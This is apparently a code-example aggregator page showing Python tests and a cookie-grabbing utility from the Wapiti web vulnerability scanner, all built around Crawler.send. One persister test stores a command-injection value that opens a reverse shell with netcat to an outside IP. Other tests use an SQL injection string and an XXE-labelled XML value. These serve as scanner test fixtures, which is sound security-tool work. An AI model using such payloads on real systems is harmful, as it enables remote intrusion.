Python Crawler.send示例，wapitiCore.net.crawler.Crawler.send Python示例

示例#1

0

显示文件

def test_timeout():
    url = "http://127.0.0.1:65080/timeout.php"

    crawler = Crawler(url, timeout=1)
    request = Request(url)

    with pytest.raises(ReadTimeout):
        crawler.send(request)

示例#2

0

显示文件

文件： test_persister.py 项目： jstanford2013/wapiti

def test_persister_upload():
    try:
        os.unlink("/tmp/crawl.db")
    except FileNotFoundError:
        pass

    persister = SqlitePersister("/tmp/crawl.db")
    persister.set_root_url("http://httpbin.org/")

    simple_upload = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["file1", ["'fname1", "content"]], ["file2", ["fname2", "content"]]]
    )

    xml_upload = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["calendar", ["calendar.xml", "<xml>Hello there</xml"]]]
    )
    persister.add_request(simple_upload)
    persister.add_request(xml_upload)
    assert persister.count_paths() == 2
    stored_requests = set(persister.get_to_browse())
    assert simple_upload in stored_requests
    assert xml_upload in stored_requests

    responses.add(
        responses.POST,
        "http://httpbin.org/post?qs1",
        body="Hello there"
    )
    crawler = Crawler("http://httpbin.org/")

    for req in stored_requests:
        crawler.send(req)
        persister.add_request(req)

        if req == simple_upload:
            assert req.file_params == simple_upload.file_params
            assert req.file_params[0] == ["file1", ["'fname1", "content"]]
            assert req.file_params[1] == ["file2", ["fname2", "content"]]
        else:
            assert req.file_params == xml_upload.file_params
            assert req.file_params[0] == ["calendar", ["calendar.xml", "<xml>Hello there</xml"]]

    naughty_file = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["calendar", ["calendar.xml", "<xml>XXE there</xml>"]]]
    )
    persister.add_vulnerability(1, "Command Execution", 1, naughty_file, "calendar", "<xml>XXE there</xml>")
    payload = next(persister.get_payloads())
    assert naughty_file == payload.evil_request
    assert payload.parameter == "calendar"
    assert len(list(persister.get_forms(path="http://httpbin.org/post"))) == 2

示例#3

0

显示文件

def test_explorer_extract_links():
    crawler = Crawler("http://perdu.com/")
    explorer = Explorer(crawler)
    responses.add(responses.GET,
                  "http://perdu.com/",
                  body="""<html><body>
        <a href="http://perdu.com/index.html"></a>
        <a href="https://perdu.com/secure_index.html"></a>
        <a href="//perdu.com/protocol_relative.html"></a>
        <a href="//lol.com/protocol_relative.html"></a>
        <a href="http://perdu.com:8000/other_port.html"></a>
        <a href="http://microsoft.com/other_domain.html"></a>
        <a href="welcome.html"></a>
        <a href="/about.html"></a>
        <form method="POST" action="http://perdu.com/valid_form.html">
        <input name="field" type="hidden" value="hello"/></form>
        <form method="POST" action="http://external.com/external_form.html">
        <input name="field" type="hidden" value="hello"/></form>
        """)

    request = Request("http://perdu.com/")
    page = crawler.send(request)
    results = list(explorer.extract_links(page, request))
    # We should get 6 resources as the âth from the form will also be used as url
    assert len(results) == 6

示例#4

0

显示文件

def test_redirect():
    slyfx = "http://www.slyfx.com/"
    disney = "http://www.disney.com/"

    responses.add(responses.GET,
                  slyfx,
                  body="Back to disneyland",
                  status=301,
                  headers={"Location": disney})

    responses.add(responses.GET, disney, body="Hello there")

    crawler = Crawler(slyfx)
    page = crawler.send(Request(slyfx))
    assert page.url == slyfx
    assert not page.history

    page = crawler.send(Request(slyfx), follow_redirects=True)
    assert page.url == disney
    assert page.history[0].url == slyfx

示例#5

0

显示文件

文件： getcookie.py 项目： jstanford2013/wapiti

def getcookie_main():
    parser = argparse.ArgumentParser(
        description=
        "Wapiti-getcookie: An utility to grab cookies from a webpage")

    parser.add_argument('-u',
                        '--url',
                        help='First page to fetch for cookies',
                        required=True)

    parser.add_argument(
        '-c',
        '--cookie',
        help='Cookie file in Wapiti JSON format where cookies will be stored',
        required=True)

    parser.add_argument('-p',
                        '--proxy',
                        help='Address of the proxy server to use')

    parser.add_argument("--tor",
                        action="store_true",
                        help=_("Use Tor listener (127.0.0.1:9050)"))

    parser.add_argument("-a",
                        "--auth-cred",
                        dest="credentials",
                        default=argparse.SUPPRESS,
                        help=_("Set HTTP authentication credentials"),
                        metavar="CREDENTIALS")

    parser.add_argument("--auth-type",
                        default=argparse.SUPPRESS,
                        help=_("Set the authentication type to use"),
                        choices=["basic", "digest", "kerberos", "ntlm"])

    parser.add_argument('-d',
                        '--data',
                        help='Data to send to the form with POST')

    parser.add_argument(
        "-A",
        "--user-agent",
        default=argparse.SUPPRESS,
        help=_("Set a custom user-agent to use for every requests"),
        metavar="AGENT",
        dest="user_agent")

    parser.add_argument(
        "-H",
        "--header",
        action="append",
        default=[],
        help=_("Set a custom header to use for every requests"),
        metavar="HEADER",
        dest="headers")

    args = parser.parse_args()

    parts = urlparse(args.url)
    if not parts.scheme or not parts.netloc or not parts.path:
        print(
            _("Invalid base URL was specified, please give a complete URL with protocol scheme"
              " and slash after the domain name."))
        sys.exit()

    server = parts.netloc
    base = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', ''))

    crawler = Crawler(base)

    if args.proxy:
        proxy_parts = urlparse(args.proxy)
        if proxy_parts.scheme and proxy_parts.netloc:
            if proxy_parts.scheme.lower() in ("http", "https", "socks"):
                crawler.set_proxy(args.proxy)

    if args.tor:
        crawler.set_proxy("socks://127.0.0.1:9050/")

    if "user_agent" in args:
        crawler.add_custom_header("user-agent", args.user_agent)

    if "credentials" in args:
        if "%" in args.credentials:
            crawler.credentials = args.credentials.split("%", 1)
        else:
            raise InvalidOptionValue("-a", args.credentials)

    if "auth_type" in args:
        crawler.auth_method = args.auth_type

    for custom_header in args.headers:
        if ":" in custom_header:
            hdr_name, hdr_value = custom_header.split(":", 1)
            crawler.add_custom_header(hdr_name.strip(), hdr_value.strip())

    # Open or create the cookie file and delete previous cookies from this server
    json_cookie = jsoncookie.JsonCookie()
    json_cookie.open(args.cookie)
    json_cookie.delete(server)

    page = crawler.get(Request(args.url), follow_redirects=True)

    # A first crawl is sometimes necessary, so let's fetch the webpage
    json_cookie.addcookies(crawler.session_cookies)

    if not args.data:
        # Not data specified, try interactive mode by fetching forms
        forms = []
        for i, form in enumerate(page.iter_forms(autofill=False)):
            if i == 0:
                print('')
                print(
                    _("Choose the form you want to use or enter 'q' to leave :"
                      ))
            print("{0}) {1}".format(i, form))
            forms.append(form)

        valid_choice_done = False
        if forms:
            nchoice = -1
            print('')
            while not valid_choice_done:
                choice = input(_("Enter a number : "))
                if choice.isdigit():
                    nchoice = int(choice)
                    if len(forms) > nchoice >= 0:
                        valid_choice_done = True
                elif choice == 'q':
                    break

            if valid_choice_done:
                form = forms[nchoice]
                print('')
                print(_("Please enter values for the following form: "))
                print(_("url = {0}").format(form.url))

                post_params = form.post_params
                for i, post_param_tuple in enumerate(post_params):
                    field, value = post_param_tuple
                    if value:
                        new_value = input(field + " (" + value + ") : ")
                    else:
                        new_value = input("{}: ".format(field))
                    post_params[i] = [field, new_value]

                request = Request(form.url, post_params=post_params)
                crawler.send(request, follow_redirects=True)

                json_cookie.addcookies(crawler.session_cookies)
    else:
        request = Request(args.url, post_params=args.data)
        crawler.send(request, follow_redirects=True)

        json_cookie.addcookies(crawler.session_cookies)

    json_cookie.dump()
    json_cookie.close()

示例#6

0

显示文件

def getcookie_main():
    parser = argparse.ArgumentParser(description="Wapiti-getcookie: An utility to grab cookies from a webpage")

    parser.add_argument(
        '-u', '--url',
        help='First page to fetch for cookies',
        required=True
    )

    parser.add_argument(
        '-c', '--cookie',
        help='Cookie file in Wapiti JSON format where cookies will be stored',
        required=True
    )

    parser.add_argument(
        '-p', '--proxy',
        help='Address of the proxy server to use'
    )

    parser.add_argument(
        '-d', '--data',
        help='Data to send to the form with POST'
    )

    args = parser.parse_args()

    parts = urlparse(args.url)
    if not parts.scheme or not parts.netloc or not parts.path:
        print(_("Invalid base URL was specified, please give a complete URL with protocol scheme"
                " and slash after the domain name."))
        exit()

    server = parts.netloc
    base = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', ''))

    crawler = Crawler(base)

    if args.proxy:
        proxy_parts = urlparse(args.proxy)
        if proxy_parts.scheme and proxy_parts.netloc:
            if proxy_parts.scheme.lower() in ("http", "https", "socks"):
                crawler.set_proxy(args.proxy)

    # Open or create the cookie file and delete previous cookies from this server
    jc = jsoncookie.JsonCookie()
    jc.open(args.cookie)
    jc.delete(server)

    page = crawler.get(Request(args.url), follow_redirects=True)

    # A first crawl is sometimes necessary, so let's fetch the webpage
    jc.addcookies(crawler.session_cookies)

    if not args.data:
        # Not data specified, try interactive mode by fetching forms
        forms = []
        for i, form in enumerate(page.iter_forms(autofill=False)):
            if i == 0:
                print('')
                print(_("Choose the form you want to use or enter 'q' to leave :"))
            print("{0}) {1}".format(i, form))
            forms.append(form)

        ok = False
        if forms:
            nchoice = -1
            print('')
            while not ok:
                choice = input(_("Enter a number : "))
                if choice.isdigit():
                    nchoice = int(choice)
                    if len(forms) > nchoice >= 0:
                        ok = True
                elif choice == 'q':
                    break

            if ok:
                form = forms[nchoice]
                print('')
                print(_("Please enter values for the following form: "))
                print(_("url = {0}").format(form.url))

                post_params = form.post_params
                for i, kv in enumerate(post_params):
                    field, value = kv
                    if value:
                        new_value = input(field + " (" + value + ") : ")
                    else:
                        new_value = input("{}: ".format(field))
                    post_params[i] = [field, new_value]

                request = Request(form.url, post_params=post_params)
                crawler.send(request, follow_redirects=True)

                jc.addcookies(crawler.session_cookies)
    else:
        request = Request(args.url, post_params=args.data)
        crawler.send(request, follow_redirects=True)

        jc.addcookies(crawler.session_cookies)

    jc.dump()
    jc.close()

示例#7

0

显示文件

def test_persister_basic():
    url = "http://httpbin.org/?k=v"
    responses.add(responses.GET, url, body="Hello world!")

    crawler = Crawler("http://httpbin.org/")

    try:
        os.unlink("/tmp/crawl.db")
    except FileNotFoundError:
        pass

    persister = SqlitePersister("/tmp/crawl.db")
    persister.set_root_url("http://httpbin.org/")

    simple_get = Request("http://httpbin.org/?k=v")

    simple_post = Request("http://httpbin.org/post?var1=a&var2=b",
                          post_params=[["post1", "c"], ["post2", "d"]])
    persister.set_to_browse([simple_get, simple_post])

    assert persister.get_root_url() == "http://httpbin.org/"
    assert persister.count_paths() == 2
    assert not len(list(persister.get_links()))
    assert not len(list(persister.get_forms()))
    assert not len(list(persister.get_payloads()))

    stored_requests = set(persister.get_to_browse())
    assert simple_get in stored_requests
    assert simple_post in stored_requests

    # If there is some requests stored then it means scan was started
    assert persister.has_scan_started()
    assert not persister.has_scan_finished()
    assert not persister.have_attacks_started()

    for req in stored_requests:
        if req == simple_get:
            crawler.send(req)
            persister.add_request(req)
            assert req.path_id == 1
            assert persister.get_path_by_id(1) == req
            break

    # Should be one now as the link was crawled
    assert len(list(persister.get_links()))
    assert persister.count_paths() == 3

    persister.set_attacked(1, "xss")
    assert persister.count_attacked("xss") == 1
    assert persister.have_attacks_started()

    naughty_get = Request("http://httpbin.org/?k=1%20%OR%200")
    persister.add_vulnerability(1, "SQL Injection", 1, naughty_get, "k",
                                "OR bypass")
    assert next(persister.get_payloads())
    persister.flush_attacks()
    assert not persister.have_attacks_started()
    assert not len(list(persister.get_payloads()))
    persister.flush_session()
    assert not persister.count_paths()

    naughty_post = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[["post1", "c"],
                     ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]])
    persister.add_vulnerability(1, "Command Execution", 1, naughty_post,
                                "post2", ";nc -e /bin/bash 9.9.9.9 9999")
    payload = next(persister.get_payloads())
    assert naughty_post == payload.evil_request
    assert payload.parameter == "post2"

示例#8

0

显示文件

def test_request_object():
    res1 = Request("http://httpbin.org/post?var1=a&var2=b",
                   post_params=[['post1', 'c'], ['post2', 'd']])

    res2 = Request("http://httpbin.org/post?var1=a&var2=z",
                   post_params=[['post1', 'c'], ['post2', 'd']])

    res3 = Request("http://httpbin.org/post?var1=a&var2=b",
                   post_params=[['post1', 'c'], ['post2', 'z']])

    res4 = Request("http://httpbin.org/post?var1=a&var2=b",
                   post_params=[['post1', 'c'], ['post2', 'd']])

    res5 = Request("http://httpbin.org/post?var1=z&var2=b",
                   post_params=[['post1', 'c'], ['post2', 'd']])

    res6 = Request("http://httpbin.org/post?var3=z&var2=b",
                   post_params=[['post1', 'c'], ['post2', 'd']])

    res7 = Request("http://httpbin.org/post?var1=z&var2=b&var4=e",
                   post_params=[['post1', 'c'], ['post2', 'd']])

    res8 = Request("http://httpbin.org/post?var2=d&var1=z",
                   post_params=[['post1', 'c'], ['post2', 'd']])

    res10 = Request("http://httpbin.org/post?qs0",
                    post_params=[['post1', 'c'], ['post2', 'd']])

    res11 = Request("http://httpbin.org/post?qs1",
                    post_params=[['post1', 'c'], ['post2', 'd']])

    res12 = Request("http://httpbin.org/post?qs1",
                    post_params=[['post1', 'c'], ['post2', 'd']],
                    file_params=[['file1', ['fname1', 'content']],
                                 ['file2', ['fname2', 'content']]])

    res13 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/videos")
    res14 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/")
    res15 = Request("https://duckduckgo.com/")
    res16 = Request("https://duckduckgo.com/",
                    post_params=[['q', 'Kung Fury']])
    res17 = Request("http://example.com:8080/dir/?x=3")

    res18 = Request("http://httpbin.org/get?a=1",
                    get_params=[['get1', 'c'], ['get2', 'd']])

    assert res1 < res2
    assert res2 > res3
    assert res1 < res3
    assert res1 == res4
    assert hash(res1) == hash(res4)
    res4.link_depth = 5
    assert hash(res1) == hash(res4)
    assert res1 != res2
    assert res2 >= res1
    assert res1 <= res3
    assert res13.file_name == "videos"
    assert res10.path == "http://httpbin.org/post"
    assert res10.file_name == "post"
    # This one is important as it could break attacks on query string
    assert res10.url == "http://httpbin.org/post?qs0"
    assert res13.parent_dir == res14.url
    assert res15.is_root
    assert res15.parent_dir == res15.url
    assert res13.dir_name == res14.url
    assert res14.dir_name == res14.url
    assert res15.dir_name == res15.url
    assert res15 != res16
    query_list = [res15]
    assert res16 not in query_list
    assert res17.dir_name == "http://example.com:8080/dir/"
    assert res18.url == "http://httpbin.org/get?get1=c&get2=d"
    assert res17.hostname == "example.com:8080"
    assert res1.encoded_get_keys == res8.encoded_get_keys
    assert res17.encoded_get_keys == "x"
    assert res16.encoded_get_keys == ""
    assert len(res12) == 5
    assert res12.encoded_get_keys == "qs1"
    assert res5.hash_params == res8.hash_params
    assert res7.hash_params != res8.hash_params

    print("Tests were successful, now launching representations")
    print("=== Basic representation follows ===")
    print(res1)
    print("=== cURL representation follows ===")
    print(res1.curl_repr)
    print("=== HTTP representation follows ===")
    print(res1.http_repr())
    print("=== POST parameters as an array ===")
    print(res1.post_params)
    print("=== POST keys encoded as string ===")
    print(res1.encoded_post_keys)
    print("=== Upload HTTP representation  ===")
    print(res12.http_repr())
    print("=== Upload basic representation ===")
    print(res12)
    print("=== Upload cURL representation  ===")
    print(res12.curl_repr)
    print("===   HTTP GET keys as a tuple  ===")
    print(res1.get_keys)
    print("===  HTTP POST keys as a tuple  ===")
    print(res1.post_keys)
    print("=== HTTP files keys as a tuple  ===")
    print(res12.file_keys)
    print('')

    json_req = Request("http://httpbin.org/post?a=b",
                       post_params=json.dumps({
                           "z": 1,
                           "a": 2
                       }),
                       enctype="application/json")

    crawler = Crawler("http://httpbin.org/")
    page = crawler.send(json_req)
    assert page.json["json"] == {"z": 1, "a": 2}
    assert page.json["headers"]["Content-Type"] == "application/json"
    assert page.json["form"] == {}

    page = crawler.send(res12)
    assert page.json["files"]

    res19 = Request("http://httpbin.org/post?qs1",
                    post_params=[['post1', 'c'], ['post2', 'd']],
                    file_params=[['file1', ['fname1', 'content']],
                                 ['file2', ['fname2', 'content']]],
                    enctype="multipart/form-data")
    page = crawler.send(res19)
    assert page.json["files"]